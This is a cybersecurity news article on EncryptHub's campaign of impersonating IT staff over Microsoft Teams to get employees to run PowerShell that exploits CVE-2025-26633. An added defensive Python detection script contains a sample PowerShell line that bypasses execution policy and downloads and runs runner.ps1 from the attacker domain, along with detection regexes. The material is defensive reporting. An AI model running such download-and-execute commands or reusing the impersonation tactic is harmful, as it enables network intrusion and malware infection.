Red Hot Cyber


Microsoft Teams Increasingly Under Fire: EncryptHub Compromised Corporate Networks with Malware

Redazione RHC : 17 August 2025 08:41

In recent years, Microsoft Teams has become one of the most popular collaboration tools within companies, transforming into a strategic channel not only for communication but also for managing documents, meetings, and operational processes.

This growing importance, however, has not gone unnoticed by cybercriminals, who are developing increasingly sophisticated attack and social engineering techniques on this platform, with the aim of infiltrating corporate networks and stealing sensitive information. The combination of implicit trust in the tool and the high volume of daily communications creates fertile ground for targeted compromise campaigns.

A prime example is the sophisticated social engineering operation orchestrated by the malicious group EncryptHub, which deployed a strategy that combines spoofing techniques with targeted technical exploits. As anticipated in yesterday’s analysis, this advanced campaign leverages impersonation tactics together with technical attack vectors, significantly compromising the security of corporate infrastructure.

This new approach, impersonating IT staff, demonstrates how the lines between social engineering and technical attacks are blurring, opening up increasingly complex scenarios for cyber defense.

The attack begins with threat actors claiming to be internal IT departments and sending Microsoft Teams connection requests to targeted employees.

Once victims accept the request and establish a remote session, the attackers guide them through the execution of PowerShell commands that appear legitimate but actually download and execute malicious scripts.

The initial command executed bypasses Windows security policies and downloads a PowerShell script named “runner.ps1” from attacker-controlled domains, such as cjhsbam[.]com.

This script is designed to exploit CVE-2025-26633, a vulnerability in the Microsoft Management Console (MMC) framework known as “MSC EvilTwin.”

CVE-2025-26633 was officially disclosed as a zero-day vulnerability in March 2025, although examples of related attacks were observed in the wild as early as February 2025. Microsoft has since released security patches, but the vulnerability continues to be actively exploited against unpatched systems.

The vulnerability has a CVSS score of 7.0, indicating high severity, and has been added to CISA’s catalog of known exploited vulnerabilities, underscoring its critical nature for federal agencies and enterprise environments.

The campaign highlights the persistent effectiveness of social engineering attacks combined with technical exploitation. “Social engineering remains one of the most effective tools in a cybercriminal’s arsenal, and the emerging EncryptHub group has quickly joined this trend,” Trustwave researchers noted.

Cybersecurity experts recommend implementing multi-layered defense strategies, including the immediate remediation of CVE-2025-26633, advanced monitoring of Microsoft Management Console activity, and comprehensive user awareness training focused on social engineering tactics.
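As an added example (not code from the article or from Trustwave), the following Python script shows how a defender could screen process-creation log lines for the two behaviours described above: PowerShell launched with a policy bypass that fetches and runs a remote .ps1, and mmc.exe loading a console file from outside the Windows directory. The log format, the mmc.exe heuristic and all file paths are assumptions; only the runner.ps1 name and the cjhsbam[.]com domain come from the article.

```python
import re

# Constructed process-creation records in a simplified "parent> image cmdline" format.
# runner.ps1 and cjhsbam[.]com are the indicators named in the article; the rest is made up.
SAMPLE_LOG = """\
ms-teams.exe> powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('https://cjhsbam[.]com/runner.ps1')"
explorer.exe> powershell.exe powershell -File C:\\Scripts\\inventory.ps1
powershell.exe> mmc.exe mmc.exe C:\\Users\\alice\\AppData\\Local\\Temp\\WmiMgmt.msc
explorer.exe> mmc.exe mmc.exe C:\\Windows\\System32\\eventvwr.msc
svchost.exe> cmd.exe cmd /c whoami
"""

# Heuristics (assumptions, not from the article): a PowerShell invocation that both
# weakens the execution policy and pulls a .ps1 from a URL, and MMC opening a .msc
# console file that does not live under C:\Windows.
POLICY_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.I)
REMOTE_PS1 = re.compile(r"""https?://[^\s'"]+\.ps1""", re.I)
MSC_PATH = re.compile(r"(\S+\.msc)\b", re.I)

def parse(line):
    """Split a record into (parent image, image, command line)."""
    parent, rest = line.split("> ", 1)
    image, _, cmdline = rest.partition(" ")
    return parent, image.lower(), cmdline

def check(line):
    """Return the name of the matching rule, or None if the record looks benign."""
    parent, image, cmdline = parse(line)
    if image == "powershell.exe" and POLICY_BYPASS.search(cmdline) and REMOTE_PS1.search(cmdline):
        return "powershell_remote_script"
    if image == "mmc.exe":
        m = MSC_PATH.search(cmdline)
        if m and not m.group(1).lower().startswith("c:\\windows\\"):
            return "mmc_nonstandard_msc"
    return None

def scan(log):
    """Return (rule, record) pairs for every record that triggers a rule."""
    findings = []
    for record in log.splitlines():
        if record.strip():
            rule = check(record)
            if rule:
                findings.append((rule, record))
    return findings

if __name__ == "__main__":
    for rule, record in scan(SAMPLE_LOG):
        print(f"[{rule}] {record}")
```

Both rules are deliberately narrow; in a real deployment they would feed an alert that an analyst correlates with the Teams contact that preceded the PowerShell session.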

Organizations should also limit remote access capabilities and implement strict vetting procedures for interactions with IT support.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
